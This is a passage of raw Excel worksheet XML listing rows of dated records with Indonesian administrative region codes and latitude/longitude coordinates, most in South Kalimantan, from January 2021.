      <c r="Y2598" t="str">
        <f t="shared" si="40"/>
        <v>-6.17569,106.76959</v>
      </c>
    </row>
    <row r="2599" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2599">
        <v>226200</v>
      </c>
      <c r="B2599" s="1">
        <v>44209</v>
      </c>
      <c r="C2599" s="2">
        <v>7.6840277777777785E-2</v>
      </c>
      <c r="D2599" t="s">
        <v>22</v>
      </c>
      <c r="E2599" t="s">
        <v>23</v>
      </c>
      <c r="F2599" t="s">
        <v>8754</v>
      </c>
      <c r="G2599" t="s">
        <v>8755</v>
      </c>
      <c r="H2599" t="s">
        <v>26</v>
      </c>
      <c r="I2599" t="s">
        <v>8756</v>
      </c>
      <c r="J2599" t="s">
        <v>6509</v>
      </c>
      <c r="L2599" t="s">
        <v>8757</v>
      </c>
      <c r="M2599">
        <v>6303050002</v>
      </c>
      <c r="N2599">
        <v>6303050</v>
      </c>
      <c r="O2599">
        <v>6303</v>
      </c>
      <c r="P2599">
        <v>63</v>
      </c>
      <c r="Q2599" t="s">
        <v>8758</v>
      </c>
      <c r="R2599" t="s">
        <v>8759</v>
      </c>
      <c r="S2599" t="s">
        <v>8751</v>
      </c>
      <c r="T2599" t="s">
        <v>6513</v>
      </c>
      <c r="U2599" s="5">
        <v>11485346</v>
      </c>
      <c r="V2599" s="5" t="s">
        <v>16779</v>
      </c>
      <c r="W2599" s="5">
        <v>-342374</v>
      </c>
      <c r="X2599" t="s">
        <v>20520</v>
      </c>
      <c r="Y2599" t="str">
        <f t="shared" si="40"/>
        <v>-3.42374,114.85346</v>
      </c>
    </row>
    <row r="2600" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2600">
        <v>226261</v>
      </c>
      <c r="B2600" s="1">
        <v>44209</v>
      </c>
      <c r="C2600" s="2">
        <v>0.43146990740740737</v>
      </c>
      <c r="D2600" t="s">
        <v>22</v>
      </c>
      <c r="E2600" t="s">
        <v>23</v>
      </c>
      <c r="F2600" t="s">
        <v>8760</v>
      </c>
      <c r="G2600" t="s">
        <v>8761</v>
      </c>
      <c r="H2600" t="s">
        <v>26</v>
      </c>
      <c r="I2600" t="s">
        <v>435</v>
      </c>
      <c r="J2600" t="s">
        <v>2622</v>
      </c>
      <c r="L2600" t="s">
        <v>8762</v>
      </c>
      <c r="M2600">
        <v>3524180016</v>
      </c>
      <c r="N2600">
        <v>3524180</v>
      </c>
      <c r="O2600">
        <v>3524</v>
      </c>
      <c r="P2600">
        <v>35</v>
      </c>
      <c r="Q2600" t="s">
        <v>8763</v>
      </c>
      <c r="R2600" t="s">
        <v>8764</v>
      </c>
      <c r="S2600" t="s">
        <v>8713</v>
      </c>
      <c r="T2600" t="s">
        <v>1221</v>
      </c>
      <c r="U2600" s="5">
        <v>11238200</v>
      </c>
      <c r="V2600" s="5" t="s">
        <v>16780</v>
      </c>
      <c r="W2600" s="5">
        <v>-703858</v>
      </c>
      <c r="X2600" t="s">
        <v>20521</v>
      </c>
      <c r="Y2600" t="str">
        <f t="shared" si="40"/>
        <v>-7.03858,112.38200</v>
      </c>
    </row>
    <row r="2601" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2601">
        <v>226262</v>
      </c>
      <c r="B2601" s="1">
        <v>44209</v>
      </c>
      <c r="C2601" s="2">
        <v>0.44921296296296293</v>
      </c>
      <c r="D2601" t="s">
        <v>22</v>
      </c>
      <c r="E2601" t="s">
        <v>23</v>
      </c>
      <c r="F2601" t="s">
        <v>8765</v>
      </c>
      <c r="H2601" t="s">
        <v>26</v>
      </c>
      <c r="I2601" t="s">
        <v>76</v>
      </c>
      <c r="J2601" t="s">
        <v>6509</v>
      </c>
      <c r="L2601" t="s">
        <v>8766</v>
      </c>
      <c r="M2601">
        <v>6303050001</v>
      </c>
      <c r="N2601">
        <v>6303050</v>
      </c>
      <c r="O2601">
        <v>6303</v>
      </c>
      <c r="P2601">
        <v>63</v>
      </c>
      <c r="Q2601" t="s">
        <v>8767</v>
      </c>
      <c r="R2601" t="s">
        <v>8759</v>
      </c>
      <c r="S2601" t="s">
        <v>8751</v>
      </c>
      <c r="T2601" t="s">
        <v>6513</v>
      </c>
      <c r="U2601" s="5">
        <v>11484409</v>
      </c>
      <c r="V2601" s="5" t="s">
        <v>16781</v>
      </c>
      <c r="W2601" s="5">
        <v>-340774</v>
      </c>
      <c r="X2601" t="s">
        <v>20522</v>
      </c>
      <c r="Y2601" t="str">
        <f t="shared" si="40"/>
        <v>-3.40774,114.84409</v>
      </c>
    </row>
    <row r="2602" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2602">
        <v>226263</v>
      </c>
      <c r="B2602" s="1">
        <v>44209</v>
      </c>
      <c r="C2602" s="2">
        <v>0.45894675925925926</v>
      </c>
      <c r="D2602" t="s">
        <v>22</v>
      </c>
      <c r="E2602" t="s">
        <v>23</v>
      </c>
      <c r="F2602" t="s">
        <v>8768</v>
      </c>
      <c r="G2602" t="s">
        <v>8769</v>
      </c>
      <c r="H2602" t="s">
        <v>26</v>
      </c>
      <c r="I2602" t="s">
        <v>523</v>
      </c>
      <c r="J2602" t="s">
        <v>8692</v>
      </c>
      <c r="M2602">
        <v>2172010004</v>
      </c>
      <c r="N2602">
        <v>2172010</v>
      </c>
      <c r="O2602">
        <v>2172</v>
      </c>
      <c r="P2602">
        <v>21</v>
      </c>
      <c r="Q2602" t="s">
        <v>8770</v>
      </c>
      <c r="R2602" t="s">
        <v>8771</v>
      </c>
      <c r="S2602" t="s">
        <v>8772</v>
      </c>
      <c r="T2602" t="s">
        <v>8697</v>
      </c>
      <c r="U2602" s="5">
        <v>10446458</v>
      </c>
      <c r="V2602" s="5" t="s">
        <v>16782</v>
      </c>
      <c r="W2602" s="5">
        <v>90225</v>
      </c>
      <c r="X2602" t="s">
        <v>14448</v>
      </c>
      <c r="Y2602" t="str">
        <f t="shared" si="40"/>
        <v>0.90225,104.46458</v>
      </c>
    </row>
    <row r="2603" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2603">
        <v>226264</v>
      </c>
      <c r="B2603" s="1">
        <v>44209</v>
      </c>
      <c r="C2603" s="2">
        <v>0.60503472222222221</v>
      </c>
      <c r="D2603" t="s">
        <v>22</v>
      </c>
      <c r="E2603" t="s">
        <v>23</v>
      </c>
      <c r="F2603" t="s">
        <v>8773</v>
      </c>
      <c r="H2603" t="s">
        <v>26</v>
      </c>
      <c r="I2603" t="s">
        <v>137</v>
      </c>
      <c r="J2603" t="s">
        <v>1656</v>
      </c>
      <c r="L2603" t="s">
        <v>7175</v>
      </c>
      <c r="M2603">
        <v>3173080003</v>
      </c>
      <c r="N2603">
        <v>3173080</v>
      </c>
      <c r="O2603">
        <v>3173</v>
      </c>
      <c r="P2603">
        <v>31</v>
      </c>
      <c r="Q2603" t="s">
        <v>157</v>
      </c>
      <c r="R2603" t="s">
        <v>157</v>
      </c>
      <c r="S2603" t="s">
        <v>62</v>
      </c>
      <c r="T2603" t="s">
        <v>33</v>
      </c>
      <c r="U2603" s="5">
        <v>10682810</v>
      </c>
      <c r="V2603" s="5" t="s">
        <v>16783</v>
      </c>
      <c r="W2603" s="5">
        <v>-617757</v>
      </c>
      <c r="X2603" t="s">
        <v>20523</v>
      </c>
      <c r="Y2603" t="str">
        <f t="shared" si="40"/>
        <v>-6.17757,106.82810</v>
      </c>
    </row>
    <row r="2604" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2604">
        <v>226265</v>
      </c>
      <c r="B2604" s="1">
        <v>44209</v>
      </c>
      <c r="C2604" s="2">
        <v>0.66937500000000005</v>
      </c>
      <c r="D2604" t="s">
        <v>22</v>
      </c>
      <c r="E2604" t="s">
        <v>23</v>
      </c>
      <c r="F2604" t="s">
        <v>8774</v>
      </c>
      <c r="G2604" t="s">
        <v>8775</v>
      </c>
      <c r="H2604" t="s">
        <v>26</v>
      </c>
      <c r="I2604" t="s">
        <v>882</v>
      </c>
      <c r="J2604" t="s">
        <v>6509</v>
      </c>
      <c r="M2604">
        <v>6372010003</v>
      </c>
      <c r="N2604">
        <v>6372010</v>
      </c>
      <c r="O2604">
        <v>6372</v>
      </c>
      <c r="P2604">
        <v>63</v>
      </c>
      <c r="Q2604" t="s">
        <v>8776</v>
      </c>
      <c r="R2604" t="s">
        <v>8777</v>
      </c>
      <c r="S2604" t="s">
        <v>8778</v>
      </c>
      <c r="T2604" t="s">
        <v>6513</v>
      </c>
      <c r="U2604" s="5">
        <v>11476620</v>
      </c>
      <c r="V2604" s="5" t="s">
        <v>16784</v>
      </c>
      <c r="W2604" s="5">
        <v>-344211</v>
      </c>
      <c r="X2604" t="s">
        <v>20524</v>
      </c>
      <c r="Y2604" t="str">
        <f t="shared" si="40"/>
        <v>-3.44211,114.76620</v>
      </c>
    </row>
    <row r="2605" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2605">
        <v>226266</v>
      </c>
      <c r="B2605" s="1">
        <v>44209</v>
      </c>
      <c r="C2605" s="2">
        <v>0.70068287037037036</v>
      </c>
      <c r="D2605" t="s">
        <v>22</v>
      </c>
      <c r="E2605" t="s">
        <v>23</v>
      </c>
      <c r="F2605" t="s">
        <v>8779</v>
      </c>
      <c r="H2605" t="s">
        <v>26</v>
      </c>
      <c r="I2605" t="s">
        <v>1624</v>
      </c>
      <c r="J2605" t="s">
        <v>6509</v>
      </c>
      <c r="L2605" t="s">
        <v>8780</v>
      </c>
      <c r="M2605">
        <v>6371040007</v>
      </c>
      <c r="N2605">
        <v>6371040</v>
      </c>
      <c r="O2605">
        <v>6371</v>
      </c>
      <c r="P2605">
        <v>63</v>
      </c>
      <c r="Q2605" t="s">
        <v>8781</v>
      </c>
      <c r="R2605" t="s">
        <v>8782</v>
      </c>
      <c r="S2605" t="s">
        <v>6512</v>
      </c>
      <c r="T2605" t="s">
        <v>6513</v>
      </c>
      <c r="U2605" s="5">
        <v>11460051</v>
      </c>
      <c r="V2605" s="5" t="s">
        <v>16785</v>
      </c>
      <c r="W2605" s="5">
        <v>-330765</v>
      </c>
      <c r="X2605" t="s">
        <v>20525</v>
      </c>
      <c r="Y2605" t="str">
        <f t="shared" si="40"/>
        <v>-3.30765,114.60051</v>
      </c>
    </row>
    <row r="2606" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2606">
        <v>226267</v>
      </c>
      <c r="B2606" s="1">
        <v>44209</v>
      </c>
      <c r="C2606" s="2">
        <v>0.70621527777777782</v>
      </c>
      <c r="D2606" t="s">
        <v>22</v>
      </c>
      <c r="E2606" t="s">
        <v>23</v>
      </c>
      <c r="F2606" t="s">
        <v>8783</v>
      </c>
      <c r="G2606" t="s">
        <v>8784</v>
      </c>
      <c r="H2606" t="s">
        <v>26</v>
      </c>
      <c r="I2606" t="s">
        <v>137</v>
      </c>
      <c r="J2606" t="s">
        <v>6509</v>
      </c>
      <c r="L2606" t="s">
        <v>8785</v>
      </c>
      <c r="M2606">
        <v>6371030010</v>
      </c>
      <c r="N2606">
        <v>6371030</v>
      </c>
      <c r="O2606">
        <v>6371</v>
      </c>
      <c r="P2606">
        <v>63</v>
      </c>
      <c r="Q2606" t="s">
        <v>8786</v>
      </c>
      <c r="R2606" t="s">
        <v>8787</v>
      </c>
      <c r="S2606" t="s">
        <v>6512</v>
      </c>
      <c r="T2606" t="s">
        <v>6513</v>
      </c>
      <c r="U2606" s="5">
        <v>11458294</v>
      </c>
      <c r="V2606" s="5" t="s">
        <v>16786</v>
      </c>
      <c r="W2606" s="5">
        <v>-330930</v>
      </c>
      <c r="X2606" t="s">
        <v>20526</v>
      </c>
      <c r="Y2606" t="str">
        <f t="shared" si="40"/>
        <v>-3.30930,114.58294</v>
      </c>
    </row>
    <row r="2607" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2607">
        <v>226268</v>
      </c>
      <c r="B2607" s="1">
        <v>44209</v>
      </c>
      <c r="C2607" s="2">
        <v>0.80159722222222218</v>
      </c>
      <c r="D2607" t="s">
        <v>22</v>
      </c>
      <c r="E2607" t="s">
        <v>23</v>
      </c>
      <c r="F2607" t="s">
        <v>8788</v>
      </c>
      <c r="H2607" t="s">
        <v>26</v>
      </c>
      <c r="I2607" t="s">
        <v>1005</v>
      </c>
      <c r="J2607" t="s">
        <v>6509</v>
      </c>
      <c r="L2607" t="s">
        <v>8789</v>
      </c>
      <c r="M2607">
        <v>6303060001</v>
      </c>
      <c r="N2607">
        <v>6303060</v>
      </c>
      <c r="O2607">
        <v>6303</v>
      </c>
      <c r="P2607">
        <v>63</v>
      </c>
      <c r="Q2607" t="s">
        <v>8790</v>
      </c>
      <c r="R2607" t="s">
        <v>8750</v>
      </c>
      <c r="S2607" t="s">
        <v>8751</v>
      </c>
      <c r="T2607" t="s">
        <v>6513</v>
      </c>
      <c r="U2607" s="5">
        <v>11491073</v>
      </c>
      <c r="V2607" s="5" t="s">
        <v>16787</v>
      </c>
      <c r="W2607" s="5">
        <v>-336774</v>
      </c>
      <c r="X2607" t="s">
        <v>20527</v>
      </c>
      <c r="Y2607" t="str">
        <f t="shared" si="40"/>
        <v>-3.36774,114.91073</v>
      </c>
    </row>
    <row r="2608" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2608">
        <v>226269</v>
      </c>
      <c r="B2608" s="1">
        <v>44209</v>
      </c>
      <c r="C2608" s="2">
        <v>0.84193287037037035</v>
      </c>
      <c r="D2608" t="s">
        <v>22</v>
      </c>
      <c r="E2608" t="s">
        <v>23</v>
      </c>
      <c r="F2608" s="3" t="s">
        <v>8791</v>
      </c>
      <c r="G2608" t="s">
        <v>8792</v>
      </c>
      <c r="H2608" t="s">
        <v>26</v>
      </c>
      <c r="I2608" t="s">
        <v>1651</v>
      </c>
      <c r="J2608" t="s">
        <v>6509</v>
      </c>
      <c r="L2608" t="s">
        <v>8793</v>
      </c>
      <c r="M2608">
        <v>6371020002</v>
      </c>
      <c r="N2608">
        <v>6371020</v>
      </c>
      <c r="O2608">
        <v>6371</v>
      </c>
      <c r="P2608">
        <v>63</v>
      </c>
      <c r="Q2608" t="s">
        <v>8794</v>
      </c>
      <c r="R2608" t="s">
        <v>8795</v>
      </c>
      <c r="S2608" t="s">
        <v>6512</v>
      </c>
      <c r="T2608" t="s">
        <v>6513</v>
      </c>
      <c r="U2608" s="5">
        <v>11460831</v>
      </c>
      <c r="V2608" s="5" t="s">
        <v>16788</v>
      </c>
      <c r="W2608" s="5">
        <v>-333311</v>
      </c>
      <c r="X2608" t="s">
        <v>20528</v>
      </c>
      <c r="Y2608" t="str">
        <f t="shared" si="40"/>
        <v>-3.33311,114.60831</v>
      </c>
    </row>
    <row r="2609" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2609">
        <v>226270</v>
      </c>
      <c r="B2609" s="1">
        <v>44209</v>
      </c>
      <c r="C2609" s="2">
        <v>0.86603009259259256</v>
      </c>
      <c r="D2609" t="s">
        <v>22</v>
      </c>
      <c r="E2609" t="s">
        <v>23</v>
      </c>
      <c r="F2609" t="s">
        <v>8796</v>
      </c>
      <c r="G2609" t="s">
        <v>8797</v>
      </c>
      <c r="H2609" t="s">
        <v>26</v>
      </c>
      <c r="I2609" t="s">
        <v>843</v>
      </c>
      <c r="J2609" t="s">
        <v>6509</v>
      </c>
      <c r="L2609" t="s">
        <v>8798</v>
      </c>
      <c r="M2609">
        <v>6303120008</v>
      </c>
      <c r="N2609">
        <v>6303120</v>
      </c>
      <c r="O2609">
        <v>6303</v>
      </c>
      <c r="P2609">
        <v>63</v>
      </c>
      <c r="Q2609" t="s">
        <v>8799</v>
      </c>
      <c r="R2609" t="s">
        <v>8800</v>
      </c>
      <c r="S2609" t="s">
        <v>8751</v>
      </c>
      <c r="T2609" t="s">
        <v>6513</v>
      </c>
      <c r="U2609" s="5">
        <v>11509386</v>
      </c>
      <c r="V2609" s="5" t="s">
        <v>16789</v>
      </c>
      <c r="W2609" s="5">
        <v>-329621</v>
      </c>
      <c r="X2609" t="s">
        <v>20529</v>
      </c>
      <c r="Y2609" t="str">
        <f t="shared" si="40"/>
        <v>-3.29621,115.09386</v>
      </c>
    </row>
    <row r="2610" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2610">
        <v>226271</v>
      </c>
      <c r="B2610" s="1">
        <v>44209</v>
      </c>
      <c r="C2610" s="2">
        <v>0.8820486111111111</v>
      </c>
      <c r="D2610" t="s">
        <v>22</v>
      </c>
      <c r="E2610" t="s">
        <v>23</v>
      </c>
      <c r="F2610" t="s">
        <v>8801</v>
      </c>
      <c r="G2610" t="s">
        <v>8802</v>
      </c>
      <c r="H2610" t="s">
        <v>26</v>
      </c>
      <c r="I2610" t="s">
        <v>523</v>
      </c>
      <c r="J2610" t="s">
        <v>6509</v>
      </c>
      <c r="L2610" t="s">
        <v>8803</v>
      </c>
      <c r="M2610">
        <v>6371010006</v>
      </c>
      <c r="N2610">
        <v>6371010</v>
      </c>
      <c r="O2610">
        <v>6371</v>
      </c>
      <c r="P2610">
        <v>63</v>
      </c>
      <c r="Q2610" t="s">
        <v>8804</v>
      </c>
      <c r="R2610" t="s">
        <v>6511</v>
      </c>
      <c r="S2610" t="s">
        <v>6512</v>
      </c>
      <c r="T2610" t="s">
        <v>6513</v>
      </c>
      <c r="U2610" s="5">
        <v>11462173</v>
      </c>
      <c r="V2610" s="5" t="s">
        <v>16790</v>
      </c>
      <c r="W2610" s="5">
        <v>-335705</v>
      </c>
      <c r="X2610" t="s">
        <v>20530</v>
      </c>
      <c r="Y2610" t="str">
        <f t="shared" si="40"/>
        <v>-3.35705,114.62173</v>
      </c>
    </row>
    <row r="2611" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2611">
        <v>226272</v>
      </c>
      <c r="B2611" s="1">
        <v>44209</v>
      </c>
      <c r="C2611" s="2">
        <v>0.94927083333333329</v>
      </c>
      <c r="D2611" t="s">
        <v>22</v>
      </c>
      <c r="E2611" t="s">
        <v>23</v>
      </c>
      <c r="F2611" t="s">
        <v>8805</v>
      </c>
      <c r="G2611" t="s">
        <v>8806</v>
      </c>
      <c r="H2611" t="s">
        <v>26</v>
      </c>
      <c r="I2611" t="s">
        <v>76</v>
      </c>
      <c r="J2611" t="s">
        <v>6509</v>
      </c>
      <c r="L2611" t="s">
        <v>8807</v>
      </c>
      <c r="M2611">
        <v>6303040001</v>
      </c>
      <c r="N2611">
        <v>6303040</v>
      </c>
      <c r="O2611">
        <v>6303</v>
      </c>
      <c r="P2611">
        <v>63</v>
      </c>
      <c r="Q2611" t="s">
        <v>8808</v>
      </c>
      <c r="R2611" t="s">
        <v>8809</v>
      </c>
      <c r="S2611" t="s">
        <v>8751</v>
      </c>
      <c r="T2611" t="s">
        <v>6513</v>
      </c>
      <c r="U2611" s="5">
        <v>11464806</v>
      </c>
      <c r="V2611" s="5" t="s">
        <v>16791</v>
      </c>
      <c r="W2611" s="5">
        <v>-332045</v>
      </c>
      <c r="X2611" t="s">
        <v>20531</v>
      </c>
      <c r="Y2611" t="str">
        <f t="shared" si="40"/>
        <v>-3.32045,114.64806</v>
      </c>
    </row>
    <row r="2612" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2612">
        <v>226273</v>
      </c>
      <c r="B2612" s="1">
        <v>44209</v>
      </c>
      <c r="C2612" s="2">
        <v>0.9650347222222222</v>
      </c>
      <c r="D2612" t="s">
        <v>22</v>
      </c>
      <c r="E2612" t="s">
        <v>23</v>
      </c>
      <c r="F2612" t="s">
        <v>8810</v>
      </c>
      <c r="G2612" t="s">
        <v>8811</v>
      </c>
      <c r="H2612" t="s">
        <v>26</v>
      </c>
      <c r="I2612" t="s">
        <v>72</v>
      </c>
      <c r="J2612" t="s">
        <v>6509</v>
      </c>
      <c r="L2612" t="s">
        <v>8812</v>
      </c>
      <c r="M2612">
        <v>6371020004</v>
      </c>
      <c r="N2612">
        <v>6371020</v>
      </c>
      <c r="O2612">
        <v>6371</v>
      </c>
      <c r="P2612">
        <v>63</v>
      </c>
      <c r="Q2612" t="s">
        <v>8808</v>
      </c>
      <c r="R2612" t="s">
        <v>8795</v>
      </c>
      <c r="S2612" t="s">
        <v>6512</v>
      </c>
      <c r="T2612" t="s">
        <v>6513</v>
      </c>
      <c r="U2612" s="5">
        <v>11463398</v>
      </c>
      <c r="V2612" s="5" t="s">
        <v>16792</v>
      </c>
      <c r="W2612" s="5">
        <v>-333796</v>
      </c>
      <c r="X2612" t="s">
        <v>20532</v>
      </c>
      <c r="Y2612" t="str">
        <f t="shared" si="40"/>
        <v>-3.33796,114.63398</v>
      </c>
    </row>
    <row r="2613" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2613">
        <v>226274</v>
      </c>
      <c r="B2613" s="1">
        <v>44209</v>
      </c>
      <c r="C2613" s="2">
        <v>0.98673611111111104</v>
      </c>
      <c r="D2613" t="s">
        <v>22</v>
      </c>
      <c r="E2613" t="s">
        <v>23</v>
      </c>
      <c r="F2613" t="s">
        <v>8813</v>
      </c>
      <c r="G2613" t="s">
        <v>8814</v>
      </c>
      <c r="H2613" t="s">
        <v>26</v>
      </c>
      <c r="I2613" t="s">
        <v>1005</v>
      </c>
      <c r="J2613" t="s">
        <v>6509</v>
      </c>
      <c r="L2613" t="s">
        <v>8815</v>
      </c>
      <c r="M2613">
        <v>6307050008</v>
      </c>
      <c r="N2613">
        <v>6307050</v>
      </c>
      <c r="O2613">
        <v>6307</v>
      </c>
      <c r="P2613">
        <v>63</v>
      </c>
      <c r="Q2613" t="s">
        <v>8816</v>
      </c>
      <c r="R2613" t="s">
        <v>8817</v>
      </c>
      <c r="S2613" t="s">
        <v>8818</v>
      </c>
      <c r="T2613" t="s">
        <v>6513</v>
      </c>
      <c r="U2613" s="5">
        <v>11538144</v>
      </c>
      <c r="V2613" s="5" t="s">
        <v>16793</v>
      </c>
      <c r="W2613" s="5">
        <v>-259160</v>
      </c>
      <c r="X2613" t="s">
        <v>20533</v>
      </c>
      <c r="Y2613" t="str">
        <f t="shared" si="40"/>
        <v>-2.59160,115.38144</v>
      </c>
    </row>
    <row r="2614" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2614">
        <v>226275</v>
      </c>
      <c r="B2614" s="1">
        <v>44209</v>
      </c>
      <c r="C2614" s="2">
        <v>0.9911226851851852</v>
      </c>
      <c r="D2614" t="s">
        <v>22</v>
      </c>
      <c r="E2614" t="s">
        <v>23</v>
      </c>
      <c r="F2614" t="s">
        <v>8819</v>
      </c>
      <c r="G2614" t="s">
        <v>8820</v>
      </c>
      <c r="H2614" t="s">
        <v>26</v>
      </c>
      <c r="I2614" t="s">
        <v>8821</v>
      </c>
      <c r="J2614" t="s">
        <v>6509</v>
      </c>
      <c r="L2614" t="s">
        <v>8822</v>
      </c>
      <c r="M2614">
        <v>6307050007</v>
      </c>
      <c r="N2614">
        <v>6307050</v>
      </c>
      <c r="O2614">
        <v>6307</v>
      </c>
      <c r="P2614">
        <v>63</v>
      </c>
      <c r="Q2614" t="s">
        <v>8823</v>
      </c>
      <c r="R2614" t="s">
        <v>8817</v>
      </c>
      <c r="S2614" t="s">
        <v>8818</v>
      </c>
      <c r="T2614" t="s">
        <v>6513</v>
      </c>
      <c r="U2614" s="5">
        <v>11538535</v>
      </c>
      <c r="V2614" s="5" t="s">
        <v>16794</v>
      </c>
      <c r="W2614" s="5">
        <v>-258509</v>
      </c>
      <c r="X2614" t="s">
        <v>20534</v>
      </c>
      <c r="Y2614" t="str">
        <f t="shared" si="40"/>
        <v>-2.58509,115.38535</v>
      </c>
    </row>
    <row r="2615" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2615">
        <v>226276</v>
      </c>
      <c r="B2615" s="1">
        <v>44210</v>
      </c>
      <c r="C2615" s="2">
        <v>2.0092592592592592E-2</v>
      </c>
      <c r="D2615" t="s">
        <v>22</v>
      </c>
      <c r="E2615" t="s">
        <v>23</v>
      </c>
      <c r="F2615" t="s">
        <v>8824</v>
      </c>
      <c r="G2615" t="s">
        <v>8825</v>
      </c>
      <c r="H2615" t="s">
        <v>26</v>
      </c>
      <c r="I2615" t="s">
        <v>76</v>
      </c>
      <c r="J2615" t="s">
        <v>6509</v>
      </c>
      <c r="L2615" t="s">
        <v>8826</v>
      </c>
      <c r="M2615">
        <v>6371031004</v>
      </c>
      <c r="N2615">
        <v>6371031</v>
      </c>
      <c r="O2615">
        <v>6371</v>
      </c>
      <c r="P2615">
        <v>63</v>
      </c>
      <c r="Q2615" t="s">
        <v>8827</v>
      </c>
      <c r="R2615" t="s">
        <v>8828</v>
      </c>
      <c r="S2615" t="s">
        <v>6512</v>
      </c>
      <c r="T2615" t="s">
        <v>6513</v>
      </c>
      <c r="U2615" s="5">
        <v>11457308</v>
      </c>
      <c r="V2615" s="5" t="s">
        <v>16795</v>
      </c>
      <c r="W2615" s="5">
        <v>-331891</v>
      </c>
      <c r="X2615" t="s">
        <v>20535</v>
      </c>
      <c r="Y2615" t="str">
        <f t="shared" si="40"/>
        <v>-3.31891,114.57308</v>
      </c>
    </row>
    <row r="2616" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2616">
        <v>226277</v>
      </c>
      <c r="B2616" s="1">
        <v>44210</v>
      </c>
      <c r="C2616" s="2">
        <v>4.9016203703703708E-2</v>
      </c>
      <c r="D2616" t="s">
        <v>22</v>
      </c>
      <c r="E2616" t="s">
        <v>23</v>
      </c>
      <c r="F2616" t="s">
        <v>8829</v>
      </c>
      <c r="G2616" t="s">
        <v>8830</v>
      </c>
      <c r="H2616" t="s">
        <v>26</v>
      </c>
      <c r="I2616" t="s">
        <v>1542</v>
      </c>
      <c r="J2616" t="s">
        <v>2627</v>
      </c>
      <c r="L2616" t="s">
        <v>8831</v>
      </c>
      <c r="M2616">
        <v>3212190012</v>
      </c>
      <c r="N2616">
        <v>3212190</v>
      </c>
      <c r="O2616">
        <v>3212</v>
      </c>
      <c r="P2616">
        <v>32</v>
      </c>
      <c r="Q2616" t="s">
        <v>8832</v>
      </c>
      <c r="R2616" t="s">
        <v>8833</v>
      </c>
      <c r="S2616" t="s">
        <v>8471</v>
      </c>
      <c r="T2616" t="s">
        <v>42</v>
      </c>
      <c r="U2616" s="5">
        <v>10808147</v>
      </c>
      <c r="V2616" s="5" t="s">
        <v>16796</v>
      </c>
      <c r="W2616" s="5">
        <v>-632485</v>
      </c>
      <c r="X2616" t="s">
        <v>20536</v>
      </c>
      <c r="Y2616" t="str">
        <f t="shared" si="40"/>
        <v>-6.32485,108.08147</v>
      </c>
    </row>
    <row r="2617" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2617">
        <v>226278</v>
      </c>
      <c r="B2617" s="1">
        <v>44210</v>
      </c>
      <c r="C2617" s="2">
        <v>5.1423611111111107E-2</v>
      </c>
      <c r="D2617" t="s">
        <v>22</v>
      </c>
      <c r="E2617" t="s">
        <v>23</v>
      </c>
      <c r="F2617" t="s">
        <v>8834</v>
      </c>
      <c r="G2617" t="s">
        <v>8835</v>
      </c>
      <c r="H2617" t="s">
        <v>26</v>
      </c>
      <c r="I2617" t="s">
        <v>8605</v>
      </c>
      <c r="J2617" t="s">
        <v>6509</v>
      </c>
      <c r="L2617" t="s">
        <v>8836</v>
      </c>
      <c r="M2617">
        <v>6305050006</v>
      </c>
      <c r="N2617">
        <v>6305050</v>
      </c>
      <c r="O2617">
        <v>6305</v>
      </c>
      <c r="P2617">
        <v>63</v>
      </c>
      <c r="Q2617" t="s">
        <v>8837</v>
      </c>
      <c r="R2617" t="s">
        <v>8838</v>
      </c>
      <c r="S2617" t="s">
        <v>8839</v>
      </c>
      <c r="T2617" t="s">
        <v>6513</v>
      </c>
      <c r="U2617" s="5">
        <v>11537007</v>
      </c>
      <c r="V2617" s="5" t="s">
        <v>16797</v>
      </c>
      <c r="W2617" s="5">
        <v>-292857</v>
      </c>
      <c r="X2617" t="s">
        <v>20537</v>
      </c>
      <c r="Y2617" t="str">
        <f t="shared" si="40"/>
        <v>-2.92857,115.37007</v>
      </c>
    </row>
    <row r="2618" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2618">
        <v>226279</v>
      </c>
      <c r="B2618" s="1">
        <v>44210</v>
      </c>
      <c r="C2618" s="2">
        <v>8.9525462962962973E-2</v>
      </c>
      <c r="D2618" t="s">
        <v>22</v>
      </c>
      <c r="E2618" t="s">
        <v>23</v>
      </c>
      <c r="F2618" t="s">
        <v>8840</v>
      </c>
      <c r="G2618" t="s">
        <v>8841</v>
      </c>
      <c r="H2618" t="s">
        <v>26</v>
      </c>
      <c r="I2618" t="s">
        <v>8842</v>
      </c>
      <c r="J2618" t="s">
        <v>6509</v>
      </c>
      <c r="L2618" t="s">
        <v>8843</v>
      </c>
      <c r="M2618">
        <v>6305050006</v>
      </c>
      <c r="N2618">
        <v>6305050</v>
      </c>
      <c r="O2618">
        <v>6305</v>
      </c>
      <c r="P2618">
        <v>63</v>
      </c>
      <c r="Q2618" t="s">
        <v>8837</v>
      </c>
      <c r="R2618" t="s">
        <v>8838</v>
      </c>
      <c r="S2618" t="s">
        <v>8839</v>
      </c>
      <c r="T2618" t="s">
        <v>6513</v>
      </c>
      <c r="U2618" s="5">
        <v>11537020</v>
      </c>
      <c r="V2618" s="5" t="s">
        <v>16798</v>
      </c>
      <c r="W2618" s="5">
        <v>-292855</v>
      </c>
      <c r="X2618" t="s">
        <v>20538</v>
      </c>
      <c r="Y2618" t="str">
        <f t="shared" si="40"/>
        <v>-2.92855,115.37020</v>
      </c>
    </row>
    <row r="2619" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2619">
        <v>226280</v>
      </c>
      <c r="B2619" s="1">
        <v>44210</v>
      </c>
      <c r="C2619" s="2">
        <v>0.13576388888888888</v>
      </c>
      <c r="D2619" t="s">
        <v>22</v>
      </c>
